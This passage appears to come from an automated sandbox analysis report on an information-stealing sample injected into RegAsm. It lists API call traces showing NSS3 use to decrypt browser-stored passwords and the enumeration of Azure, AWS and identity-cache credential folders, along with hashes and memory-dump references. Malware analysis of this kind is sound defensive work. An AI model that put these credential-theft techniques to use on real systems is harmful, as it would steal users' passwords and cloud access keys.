                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DAC), ref: 00408670
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 00408680
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014), ref: 00408690
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 004086A4
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrcat.KERNEL32(00425BDF,00425BE3), ref: 0040840B
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrcat.KERNEL32(00425BDF,00425BE6), ref: 00408423
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004086B5
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DB0), ref: 004086C3
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DB4), ref: 004086D1
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 004086E1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004086F7
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408753
                                                                                                                                                                                                                                                                  • NSS_Shutdown.NSS3 ref: 00408759
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                  • API String ID: 2888107993-347816968
                                                                                                                                                                                                                                                                  • Opcode ID: 539ef243f2ae8c3d081cd64f341def717f986a1dbbf517a3e5e3c92da4f77b3f
                                                                                                                                                                                                                                                                  • Instruction ID: 9bc58490b6cb9bbaf61b34de7f0c058facaa2db03e444b3a35631fabe54f0609
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 539ef243f2ae8c3d081cd64f341def717f986a1dbbf517a3e5e3c92da4f77b3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA17E75800119EFDB11EBA0DD49EEEBF7AFF1A314F14142AF611B21A1DB381A48CB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C901DA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C901DB2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C901DD8
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C901E4F
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C901EA4
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C901ECD
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C901EEF
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C901F17
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C901F34
                                                                                                                                                                                                                                                                  • PR_SetLogBuffering.NSS3(00004000), ref: 6C901F61
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C901F6E
                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C901F83
                                                                                                                                                                                                                                                                  • PR_SetLogFile.NSS3(00000000), ref: 6C901FA2
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C901FB8
                                                                                                                                                                                                                                                                  • OutputDebugStringA.KERNEL32(00000000), ref: 6C901FCB
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C901FD2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                                  • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                                  • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                                  • Opcode ID: 0b8924eb05de9d6ef3b2b223e5eb036d270f53faed9fdfec0d6fd153681e3e0d
                                                                                                                                                                                                                                                                  • Instruction ID: b5e05061e2ffababa25bab56d6cab8227d3522790b9be6b3710451a53fdbf621
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b8924eb05de9d6ef3b2b223e5eb036d270f53faed9fdfec0d6fd153681e3e0d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C518DB1E002599FDF00DBE5CD44BAE77B8AF0234CF084529EA19DBA00E774D599CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C50
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C5B
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(6CA4AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C76
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974CAE
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CC9
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CF4
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974D0B
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D5E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D68
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C974D85
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C974DA2
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C974DB9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C974DCF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                  • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                  • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041689A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004168BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004168E0
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.azure\), ref: 004168FD
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416938
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00416963
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00416980
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004169BB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004169E6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00416A03
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416A3E
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                  • API String ID: 2836893066-974132213
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C952DEC
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C952E00
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E2B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E43
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000,?), ref: 6C952E74
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000), ref: 6C952E88
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EC6
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EE4
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EF8
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C952F62
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C952F86
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C952F9E
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C952FCA
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C95301A
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C95302E
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C953066
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C953085
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C9530EC
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C95310C
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C953124
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C95314C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C939180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C93918D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C939180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C9391A0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C95316D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                  • Opcode ID: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                                                                                                                                  • Instruction ID: 81133d26f67a8929b78b11d702dba282b498828d2445226768ead7576b1bbc88
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F1CE71E00619EFDF00DF64D844AAABBB8BF09318F448169EC04A7711E735E9A6CB90
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C956943
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C956957
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C956972
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C956983
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9569AA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9569BE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9569D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9569DF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C956A5B
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956D8C
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956DC5
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956DD6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956DE7
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956E1F
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E4B
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E72
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EA7
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EC4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956ED5
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956EE3
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EF4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F08
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956F35
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F44
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F5B
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956F65
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956F90
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956FC5
                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C956FF4
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                                                                                                                                  • Instruction ID: 54d44234bf34edfd341a3962b37d7fd140b33c8ff5335cb449d70aed5bb66da7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91B170B0E022199FEF00CBA5DC44B9EBBB9AF05348F540124E815E7B40E735E979CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954C4C
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954C60
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CA1
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C954CBE
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CD2
                                                                                                                                                                                                                                                                  • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D3A
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D4F
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954DB7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954DD7
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954DEC
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954E1B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C954E2F
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954E5A
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C954E71
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C954E7A
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954EA2
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954EC1
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954ED6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954F01
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C954F2A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
